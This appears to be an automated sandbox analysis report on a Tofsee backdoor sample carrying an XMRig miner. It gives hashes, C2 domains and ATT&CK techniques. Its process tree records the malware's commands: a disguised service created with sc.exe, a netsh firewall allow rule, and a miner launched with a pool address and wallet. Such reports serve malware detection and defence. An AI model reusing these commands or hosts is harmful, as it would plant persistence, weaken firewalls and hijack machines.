Overview

overview

10

Static

static

dridex

windows10_x64

10

Analysis

  • max time kernel
    147s
  • max time network
    152s
  • platform
    windows10_x64
  • resource
    win10-20220414-en
  • submitted
    05-06-2022 10:37

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    3cc581151b1b4d4b6a61a806a465b1382a6aa47d4534444c1baeeb9e83c487e6.exe

  • Size

    310KB

  • MD5

    a45e220e667e0d0e85b476f6e5835086

  • SHA1

    1a48b13932940ec999cbd46ff74406bc9931806c

  • SHA256

    3cc581151b1b4d4b6a61a806a465b1382a6aa47d4534444c1baeeb9e83c487e6

  • SHA512

    852487ba3bf35ef128e7ce61d7ecde726eacf4cab2ee9c45632afe22662ff8fe713d243c73b07ffb0ae2c416218c9c8e548dba3214de9ad169265bbd925604ef

Score
10/10
tofseexmrigevasionminerpersistencetrojan

Malware Config

Extracted

Family

tofsee

C2

svartalfheim.top

jotunheim.name

Signatures

  • Tofsee

    Backdoor/botnet which carries out malicious activities based on commands from a C2 server.

    trojantofsee
  • Windows security bypass 2 TTPs 1 IoCs
    evasiontrojan
  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

    minerxmrig
  • XMRig Miner Payload 1 IoCs
    miner
  • Creates new service(s) 1 TTPs
    persistence
  • Executes dropped EXE 1 IoCs
  • Modifies Windows Firewall 1 TTPs 1 IoCs
    evasion
  • Sets service image path in registry 2 TTPs 1 IoCs
    persistence
  • Deletes itself 1 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 2 IoCs
  • Suspicious use of SetThreadContext 2 IoCs
  • Launches sc.exe 3 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Modifies data under HKEY_USERS 7 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 28 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\3cc581151b1b4d4b6a61a806a465b1382a6aa47d4534444c1baeeb9e83c487e6.exe
    "C:\Users\Admin\AppData\Local\Temp\3cc581151b1b4d4b6a61a806a465b1382a6aa47d4534444c1baeeb9e83c487e6.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:3020
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\oswvfbdi\
      2⤵
        PID:4696
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\Admin\AppData\Local\Temp\qhwiyawp.exe" C:\Windows\SysWOW64\oswvfbdi\
        2⤵
          PID:5044
        • C:\Windows\SysWOW64\sc.exe
          "C:\Windows\System32\sc.exe" create oswvfbdi binPath= "C:\Windows\SysWOW64\oswvfbdi\qhwiyawp.exe /d\"C:\Users\Admin\AppData\Local\Temp\3cc581151b1b4d4b6a61a806a465b1382a6aa47d4534444c1baeeb9e83c487e6.exe\"" type= own start= auto DisplayName= "wifi support"
          2⤵
          • Launches sc.exe
          PID:5000
        • C:\Windows\SysWOW64\sc.exe
          "C:\Windows\System32\sc.exe" description oswvfbdi "wifi internet conection"
          2⤵
          • Launches sc.exe
          PID:1096
        • C:\Windows\SysWOW64\sc.exe
          "C:\Windows\System32\sc.exe" start oswvfbdi
          2⤵
          • Launches sc.exe
          PID:3968
        • C:\Windows\SysWOW64\netsh.exe
          "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul
          2⤵
          • Modifies Windows Firewall
          PID:5112
      • C:\Windows\SysWOW64\oswvfbdi\qhwiyawp.exe
        C:\Windows\SysWOW64\oswvfbdi\qhwiyawp.exe /d"C:\Users\Admin\AppData\Local\Temp\3cc581151b1b4d4b6a61a806a465b1382a6aa47d4534444c1baeeb9e83c487e6.exe"
        1⤵
        • Executes dropped EXE
        • Suspicious use of SetThreadContext
        • Suspicious use of WriteProcessMemory
        PID:344
        • C:\Windows\SysWOW64\svchost.exe
          svchost.exe
          2⤵
          • Windows security bypass
          • Sets service image path in registry
          • Deletes itself
          • Drops file in System32 directory
          • Suspicious use of SetThreadContext
          • Modifies data under HKEY_USERS
          • Suspicious use of WriteProcessMemory
          PID:3320
          • C:\Windows\SysWOW64\svchost.exe
            svchost.exe -o fastpool.xyz:10060 -u 9mLwUkiK8Yp89zQQYodWKN29jVVVz1cWDFZctWxge16Zi3TpHnSBnnVcCDhSRXdesnMBdVjtDwh1N71KD9z37EzgKSM1tmS.60000 -p x -k -a cn/half
            3⤵
            • Suspicious use of AdjustPrivilegeToken
            PID:2816

      Network

      MITRE ATT&CK Matrix ATT&CK v6

      Initial Access

      Execution

      Persistence

      New Service

      1
      T1050

      Modify Existing Service

      1
      T1031

      Registry Run Keys / Startup Folder

      1
      T1060

      Privilege Escalation

      New Service

      1
      T1050

      Defense Evasion

      Disabling Security Tools

      1
      T1089

      Modify Registry

      2
      T1112

      Credential Access

      Discovery

      System Information Discovery

      1
      T1082

      Lateral Movement

      Collection

      Exfiltration

      Command and Control

      Impact

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\Users\Admin\AppData\Local\Temp\qhwiyawp.exe
        Filesize

        14.6MB

        MD5

        a94579efb56b934a0c2f5653b37369bf

        SHA1

        120f1fd31a41cbd699b83c18d4858534a26ae29f

        SHA256

        bc44b8431103be8306faa5341be24a74ae21b6f6bdc4b70ef690a8e70b67b65a

        SHA512

        9517f50b39cad235cd2dea090baba6590ce2bc96403df4a71507274ae9da6f3efaad8d9f3ae3fe5bcde606e6949fd37ac682595c5a7b2764aa15c16d30ed278d

        Download Submit
      • C:\Windows\SysWOW64\oswvfbdi\qhwiyawp.exe
        Filesize

        14.6MB

        MD5

        a94579efb56b934a0c2f5653b37369bf

        SHA1

        120f1fd31a41cbd699b83c18d4858534a26ae29f

        SHA256

        bc44b8431103be8306faa5341be24a74ae21b6f6bdc4b70ef690a8e70b67b65a

        SHA512

        9517f50b39cad235cd2dea090baba6590ce2bc96403df4a71507274ae9da6f3efaad8d9f3ae3fe5bcde606e6949fd37ac682595c5a7b2764aa15c16d30ed278d

        Download Submit
      • memory/344-323-0x0000000000400000-0x00000000004F3000-memory.dmp
        Filesize

        972KB

        Download
      • memory/344-320-0x000000000084C000-0x000000000085D000-memory.dmp
        Filesize

        68KB

        Download
      • memory/344-284-0x0000000000500000-0x000000000064A000-memory.dmp
        Filesize

        1.3MB

        Download
      • memory/344-281-0x000000000084C000-0x000000000085D000-memory.dmp
        Filesize

        68KB

        Download
      • memory/1096-187-0x0000000077520000-0x00000000776AE000-memory.dmp
        Filesize

        1.6MB

        Download
      • memory/1096-188-0x0000000077520000-0x00000000776AE000-memory.dmp
        Filesize

        1.6MB

        Download
      • memory/1096-185-0x0000000000000000-mapping.dmp
        Download
      • memory/1096-186-0x0000000077520000-0x00000000776AE000-memory.dmp
        Filesize

        1.6MB

        Download
      • memory/2816-520-0x000000000338259C-mapping.dmp
        Download
      • memory/3020-157-0x0000000077520000-0x00000000776AE000-memory.dmp
        Filesize

        1.6MB

        Download
      • memory/3020-164-0x0000000077520000-0x00000000776AE000-memory.dmp
        Filesize

        1.6MB

        Download
      • memory/3020-129-0x0000000077520000-0x00000000776AE000-memory.dmp
        Filesize

        1.6MB

        Download
      • memory/3020-130-0x0000000077520000-0x00000000776AE000-memory.dmp
        Filesize

        1.6MB

        Download
      • memory/3020-131-0x0000000077520000-0x00000000776AE000-memory.dmp
        Filesize

        1.6MB

        Download
      • memory/3020-132-0x0000000077520000-0x00000000776AE000-memory.dmp
        Filesize

        1.6MB

        Download
      • memory/3020-133-0x0000000077520000-0x00000000776AE000-memory.dmp
        Filesize

        1.6MB

        Download
      • memory/3020-134-0x0000000077520000-0x00000000776AE000-memory.dmp
        Filesize

        1.6MB

        Download
      • memory/3020-135-0x0000000077520000-0x00000000776AE000-memory.dmp
        Filesize

        1.6MB

        Download
      • memory/3020-136-0x0000000000751000-0x0000000000762000-memory.dmp
        Filesize

        68KB

        Download
      • memory/3020-137-0x0000000077520000-0x00000000776AE000-memory.dmp
        Filesize

        1.6MB

        Download
      • memory/3020-139-0x0000000077520000-0x00000000776AE000-memory.dmp
        Filesize

        1.6MB

        Download
      • memory/3020-140-0x0000000077520000-0x00000000776AE000-memory.dmp
        Filesize

        1.6MB

        Download
      • memory/3020-138-0x0000000000600000-0x000000000074A000-memory.dmp
        Filesize

        1.3MB

        Download
      • memory/3020-141-0x0000000077520000-0x00000000776AE000-memory.dmp
        Filesize

        1.6MB

        Download
      • memory/3020-142-0x0000000077520000-0x00000000776AE000-memory.dmp
        Filesize

        1.6MB

        Download
      • memory/3020-143-0x0000000077520000-0x00000000776AE000-memory.dmp
        Filesize

        1.6MB

        Download
      • memory/3020-144-0x0000000077520000-0x00000000776AE000-memory.dmp
        Filesize

        1.6MB

        Download
      • memory/3020-145-0x0000000077520000-0x00000000776AE000-memory.dmp
        Filesize

        1.6MB

        Download
      • memory/3020-146-0x0000000077520000-0x00000000776AE000-memory.dmp
        Filesize

        1.6MB

        Download
      • memory/3020-147-0x0000000077520000-0x00000000776AE000-memory.dmp
        Filesize

        1.6MB

        Download
      • memory/3020-148-0x0000000077520000-0x00000000776AE000-memory.dmp
        Filesize

        1.6MB

        Download
      • memory/3020-149-0x0000000077520000-0x00000000776AE000-memory.dmp
        Filesize

        1.6MB

        Download
      • memory/3020-150-0x0000000077520000-0x00000000776AE000-memory.dmp
        Filesize

        1.6MB

        Download
      • memory/3020-152-0x0000000077520000-0x00000000776AE000-memory.dmp
        Filesize

        1.6MB

        Download
      • memory/3020-151-0x0000000077520000-0x00000000776AE000-memory.dmp
        Filesize

        1.6MB

        Download
      • memory/3020-154-0x0000000077520000-0x00000000776AE000-memory.dmp
        Filesize

        1.6MB

        Download
      • memory/3020-153-0x0000000077520000-0x00000000776AE000-memory.dmp
        Filesize

        1.6MB

        Download
      • memory/3020-155-0x0000000077520000-0x00000000776AE000-memory.dmp
        Filesize

        1.6MB

        Download
      • memory/3020-156-0x0000000077520000-0x00000000776AE000-memory.dmp
        Filesize

        1.6MB

        Download
      • memory/3020-158-0x0000000000400000-0x00000000004F3000-memory.dmp
        Filesize

        972KB

        Download
      • memory/3020-127-0x0000000077520000-0x00000000776AE000-memory.dmp
        Filesize

        1.6MB

        Download
      • memory/3020-159-0x0000000077520000-0x00000000776AE000-memory.dmp
        Filesize

        1.6MB

        Download
      • memory/3020-160-0x0000000077520000-0x00000000776AE000-memory.dmp
        Filesize

        1.6MB

        Download
      • memory/3020-161-0x0000000077520000-0x00000000776AE000-memory.dmp
        Filesize

        1.6MB

        Download
      • memory/3020-162-0x0000000077520000-0x00000000776AE000-memory.dmp
        Filesize

        1.6MB

        Download
      • memory/3020-163-0x0000000077520000-0x00000000776AE000-memory.dmp
        Filesize

        1.6MB

        Download
      • memory/3020-128-0x0000000077520000-0x00000000776AE000-memory.dmp
        Filesize

        1.6MB

        Download
      • memory/3020-165-0x0000000077520000-0x00000000776AE000-memory.dmp
        Filesize

        1.6MB

        Download
      • memory/3020-166-0x0000000077520000-0x00000000776AE000-memory.dmp
        Filesize

        1.6MB

        Download
      • memory/3020-117-0x0000000077520000-0x00000000776AE000-memory.dmp
        Filesize

        1.6MB

        Download
      • memory/3020-118-0x0000000077520000-0x00000000776AE000-memory.dmp
        Filesize

        1.6MB

        Download
      • memory/3020-119-0x0000000077520000-0x00000000776AE000-memory.dmp
        Filesize

        1.6MB

        Download
      • memory/3020-120-0x0000000077520000-0x00000000776AE000-memory.dmp
        Filesize

        1.6MB

        Download
      • memory/3020-121-0x0000000077520000-0x00000000776AE000-memory.dmp
        Filesize

        1.6MB

        Download
      • memory/3020-215-0x0000000000751000-0x0000000000762000-memory.dmp
        Filesize

        68KB

        Download
      • memory/3020-218-0x0000000000400000-0x00000000004F3000-memory.dmp
        Filesize

        972KB

        Download
      • memory/3020-122-0x0000000077520000-0x00000000776AE000-memory.dmp
        Filesize

        1.6MB

        Download
      • memory/3020-123-0x0000000077520000-0x00000000776AE000-memory.dmp
        Filesize

        1.6MB

        Download
      • memory/3020-124-0x0000000077520000-0x00000000776AE000-memory.dmp
        Filesize

        1.6MB

        Download
      • memory/3020-125-0x0000000077520000-0x00000000776AE000-memory.dmp
        Filesize

        1.6MB

        Download
      • memory/3020-126-0x0000000077520000-0x00000000776AE000-memory.dmp
        Filesize

        1.6MB

        Download
      • memory/3320-315-0x0000000000509A6B-mapping.dmp
        Download
      • memory/3320-387-0x0000000000500000-0x0000000000515000-memory.dmp
        Filesize

        84KB

        Download
      • memory/3320-485-0x0000000000500000-0x0000000000515000-memory.dmp
        Filesize

        84KB

        Download
      • memory/3968-190-0x0000000000000000-mapping.dmp
        Download
      • memory/4696-169-0x0000000077520000-0x00000000776AE000-memory.dmp
        Filesize

        1.6MB

        Download
      • memory/4696-168-0x0000000077520000-0x00000000776AE000-memory.dmp
        Filesize

        1.6MB

        Download
      • memory/4696-170-0x0000000077520000-0x00000000776AE000-memory.dmp
        Filesize

        1.6MB

        Download
      • memory/4696-167-0x0000000000000000-mapping.dmp
        Download
      • memory/4696-172-0x0000000077520000-0x00000000776AE000-memory.dmp
        Filesize

        1.6MB

        Download
      • memory/4696-171-0x0000000077520000-0x00000000776AE000-memory.dmp
        Filesize

        1.6MB

        Download
      • memory/5000-184-0x0000000077520000-0x00000000776AE000-memory.dmp
        Filesize

        1.6MB

        Download
      • memory/5000-182-0x0000000077520000-0x00000000776AE000-memory.dmp
        Filesize

        1.6MB

        Download
      • memory/5000-183-0x0000000077520000-0x00000000776AE000-memory.dmp
        Filesize

        1.6MB

        Download
      • memory/5000-181-0x0000000077520000-0x00000000776AE000-memory.dmp
        Filesize

        1.6MB

        Download
      • memory/5000-180-0x0000000000000000-mapping.dmp
        Download
      • memory/5044-174-0x0000000077520000-0x00000000776AE000-memory.dmp
        Filesize

        1.6MB

        Download
      • memory/5044-178-0x0000000077520000-0x00000000776AE000-memory.dmp
        Filesize

        1.6MB

        Download
      • memory/5044-176-0x0000000077520000-0x00000000776AE000-memory.dmp
        Filesize

        1.6MB

        Download
      • memory/5044-177-0x0000000077520000-0x00000000776AE000-memory.dmp
        Filesize

        1.6MB

        Download
      • memory/5044-175-0x0000000077520000-0x00000000776AE000-memory.dmp
        Filesize

        1.6MB

        Download
      • memory/5044-173-0x0000000000000000-mapping.dmp
        Download
      • memory/5112-213-0x0000000000000000-mapping.dmp
        Download